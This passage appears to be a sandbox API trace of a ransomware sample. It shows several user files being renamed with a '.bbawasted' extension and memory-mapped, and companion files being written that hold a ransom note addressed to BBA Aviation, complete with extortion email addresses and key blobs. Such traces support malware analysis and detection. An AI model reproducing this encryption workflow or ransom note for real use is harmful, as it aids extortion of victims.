[0210.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6c4b88 [0210.358] lstrcpyW (in: lpString1=0x6c4bd4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0210.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.358] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0210.359] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0210.359] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0210.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\y6RqMI.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\y6rqmi.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0210.826] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0210.827] SetEndOfFile (hFile=0x294) returned 1 [0210.827] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.827] lstrcpyW (in: lpString1=0x6c4bd4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0210.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\y6RqMI.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\y6rqmi.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\y6RqMI.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\y6rqmi.wav.bbawasted")) returned 1 [0210.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\y6RqMI.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\y6rqmi.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0210.829] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0210.829] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x81b1 [0210.829] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x81b1) returned 0x5f0000 [0210.829] CloseHandle (hObject=0x27c) returned 1 [0210.841] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0210.841] CloseHandle (hObject=0x280) returned 1 [0210.842] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0210.842] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5e88) returned 1 [0210.842] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0210.842] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0210.842] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0210.843] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0210.843] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0210.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0210.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0210.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.855] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LLXiyjnwwdqLuHiX+urHJhpfOA+COOVxZFqmPZbQTxDZXp//0KhFHy7ivN3eCVQc\r\nWrr0X9C6dnOEVurEDcmhYoxkUknNEelv5e/uY1DPNJ9Oi53rsSDi3FyC99vmgEMa\r\nGDxebYQjTK4emvnIwvJSDN7Ta0Ot4E9kGcbpynZ4t04qpttUeaK/l+TkDPEDrPf1\r\ngyL12/qhJgaHCmWo7bwIAfOvC5O17vrTdAmHybfGtJizBpPsm3NqrUj14KObQ6Yd\r\ncKzkvjEmA/F9C2sXqr7OwcSaEmSPeREs77DIBzfJ24pw8NP7CExjgiGjLRsJcvS5\r\nQSxaUHXA8ZIgDvYlkN/TfZ6ZBA2zYT8Pk+Lcpu9Kt4sA5vkUJo6GwbHaYGOKoNJg\r\nCJq9b0N7hrsii1gOyAnnIjNfHdM8FKmMFHYLUhUzcKyH/NxX4Xf+kyhXp5MJGJws\r\noku9jl03equzVuOHYpbDoW8c1Q6MummFTwBDP9vKklGMMmUOy9gMk3kCmkKFIXVW\r\nOloQpFqUSVpNNM335p6l3s0BMxaGe14gsN4I4MuzNwXH07lgtp+qCfl+YCm+9idz\r\nQQDl0hwf1MuTTnm5U2GOvqz2mhYaUUYdhLL85TcXbmn1mRE4D7r8nDeC3qFofzqd\r\njXKfVB1gzFhspPBBtrjuSf92+mEVzGtm1qSQlFQs4z0=[end_key]\r\nKEEP IT\r\n") returned 984 [0210.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0210.855] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0210.855] SetEndOfFile (hFile=0x294) returned 1 [0210.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.860] CloseHandle (hObject=0x294) returned 1 [0210.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0210.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3a40 | out: hHeap=0x660000) returned 1 [0210.864] _aulldvrm () returned 0x0 [0210.864] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0210.865] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0210.865] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0210.865] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\z-T TKpZk4m9HLS1_J.gif") returned 50 [0210.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a1538 [0210.865] lstrcpyW (in: lpString1=0x6a159c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0210.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.865] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0210.866] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0210.866] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0210.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\z-T TKpZk4m9HLS1_J.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\z-t tkpzk4m9hls1_j.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0210.867] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0210.868] SetEndOfFile (hFile=0x294) returned 1 [0210.868] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.868] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.868] lstrcpyW (in: lpString1=0x6a159c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0210.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\z-T TKpZk4m9HLS1_J.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\z-t tkpzk4m9hls1_j.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\z-T TKpZk4m9HLS1_J.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\z-t tkpzk4m9hls1_j.gif.bbawasted")) returned 1 [0210.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\z-T TKpZk4m9HLS1_J.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\z-t tkpzk4m9hls1_j.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0210.869] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0210.870] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16e91 [0210.870] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16e91) returned 0x5f0000 [0210.870] CloseHandle (hObject=0x280) returned 1 [0211.030] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0211.036] CloseHandle (hObject=0x27c) returned 1 [0211.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0211.036] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0211.037] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0211.037] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0211.037] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0211.038] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0211.038] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0211.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0211.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0211.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0211.050] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OA3pND3cPTcuoYWPG7WjfmwvuYF5xOsfdAr9y5jrWPKjrT2e2IL0Sim46eVlTMDF\r\nGSCjmNq6VANP9npXR3JXftchUtvZybbexb6z+QtFii7X1V7kOszHrOYi5m+JWu4h\r\n1YChrQP+Q5uLe4ewNzhPoqB9ngmhZtcldBy5H7tBC42mzGecZelGUQKSEBog/hjs\r\nGAIGz9IDzm5Isqea6AepgN6MfJAQi/dxCs8/ff292Ez1+0Elj2bsa6s8l+7Dcp3Y\r\n3FzUtG+pCye8ABmHPhp2qlOc1WxM/WrfmJwgSMEUMu8f0WhdOBPcrnRSNYyCVEnZ\r\nrrm7fJzwcf3lRVOG8LPU3AG7l/4ccZKe6hUjKH7j3pwDBsKxlhB7XMBQyHinY6NU\r\nOponK40SdOb2diHxL3xzAIqNbZXBJZuVSFaXe3uowCcTdGGcBYRZzvugYF+KZVo0\r\nc/un57ggTfUYeKvuOZxuOo9+gIRl4740iewkSXx1J7+1mWjAXfXzvBooXeJs70U/\r\n3B5vLah899aW1qMBNMtliuwK2oreAsuRlBPlULOg6fHN3nhmM76e5aY5rHYrLzgt\r\nFi+RmVSG+AscEkpB2eSwTSyJ/NgJq7qyORXxJQGHtO4EZUnC4T6B8ogQHF4vkqpb\r\nI2uw8NryOO1R84B6cHBBZ6OnTu1e+PiGcfBRm1KEvze=[end_key]\r\nKEEP IT\r\n") returned 984 [0211.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0211.050] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0211.050] SetEndOfFile (hFile=0x294) returned 1 [0211.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0211.544] CloseHandle (hObject=0x294) returned 1 [0211.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0211.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1b70 | out: hHeap=0x660000) returned 1 [0211.549] _aulldvrm () returned 0x0 [0211.549] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0211.552] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0211.552] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0211.552] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3aNVMkiEo0kkEsOC_.pptx") returned 52 [0211.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0211.552] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0211.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0211.552] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0211.556] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0211.556] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0211.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3aNVMkiEo0kkEsOC_.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\3anvmkieo0kkesoc_.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0211.561] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0211.562] SetEndOfFile (hFile=0x294) returned 1 [0211.562] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0211.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0211.562] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0211.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3aNVMkiEo0kkEsOC_.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\3anvmkieo0kkesoc_.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3aNVMkiEo0kkEsOC_.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\3anvmkieo0kkesoc_.pptx.bbawasted")) returned 1 [0211.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3aNVMkiEo0kkEsOC_.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\3anvmkieo0kkesoc_.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0211.565] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0211.565] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x7c6e [0211.565] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c6e) returned 0x5f0000 [0211.565] CloseHandle (hObject=0x27c) returned 1 [0211.732] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0211.733] CloseHandle (hObject=0x280) returned 1 [0211.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0211.733] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0211.734] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0211.734] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0211.734] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0211.735] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0211.735] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0211.746] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0211.747] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0211.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0211.747] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cs5gBTRaOwA5DLZlQKFgAQJHt2YBMJAvBako8O7M5jHbMJ1hBOwCYJLqIpdpCEEi\r\n3Rp/C3VC8rKmZG3ohbTMmgWZnX0BApnTWM3LoGNeGLj/8o2CqBRNAVyZVjc4DGp1\r\nFlcK/8KRTiYPC/fynT8878K0vrI7KhI2kHP6EO55JUtIqXvMYf7wsyoMtP21N+BT\r\n6/726rbdBZLbntieJGKjDABH/w+KQfYUFco6YOKK6kqFmsHpH5lKVEGFTHBewDHy\r\nDdAJQvRCtOPbeuQ3JDKagPEyUG26eKeHZtXHSEcH37ecwRGdcp9nJIn/R6Hn/ZzX\r\nsGwnlRQ1lgEpneuqCn9fHmMoalf3VImh1PLZEMShyXiKmk39qwRitPOM0RK3yMtJ\r\nlMky+YdKg/joEaDUJtzrvP9wHTykjnUojvZWJ5JfJ7tmvXFbSI706yKOQQ6crvZP\r\ne/T8EgeKaeJBbCPIropQHyMoRbMXyFaEYGGP06sbzysX2ywcY1dv0H0iaPm8WVfC\r\n66VTpxOPASodXVQ0yMYr2D1n1P5PXHU6X3b610Q/yWAv+yUnuCWjNGhNOUNIplvv\r\n1ElPNcnljH6KckYEMHvZIzM66w7qEve0NW60Akh2uRQYL/Cm8ebtFMI644Sh5/1h\r\nFeaCPfbKSLqdGdagiPlH3ptGaTDwXmPm0ORHfoSyKHC=[end_key]\r\nKEEP IT\r\n") returned 984 [0211.747] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0211.747] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0211.748] SetEndOfFile (hFile=0x294) returned 1 [0211.751] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0211.751] CloseHandle (hObject=0x294) returned 1 [0211.756] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0211.756] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b08a8 | out: hHeap=0x660000) returned 1 [0211.756] _aulldvrm () returned 0x0 [0211.756] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0211.757] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0211.757] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0211.757] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3xjI6p2E0wKzgqkV.ods") returned 50 [0211.757] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a21e0 [0211.758] lstrcpyW (in: lpString1=0x6a2244, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0211.758] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0211.758] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0211.758] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0211.758] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0211.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3xjI6p2E0wKzgqkV.ods.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\3xji6p2e0wkzgqkv.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0211.759] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0211.761] SetEndOfFile (hFile=0x294) returned 1 [0211.761] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0211.761] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0211.761] lstrcpyW (in: lpString1=0x6a2244, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0211.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3xjI6p2E0wKzgqkV.ods" (normalized: "c:\\users\\fd1hvy\\documents\\3xji6p2e0wkzgqkv.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3xjI6p2E0wKzgqkV.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\3xji6p2e0wkzgqkv.ods.bbawasted")) returned 1 [0211.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\3xjI6p2E0wKzgqkV.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\3xji6p2e0wkzgqkv.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0211.763] CreateFileMappingW (hFile=0x280, 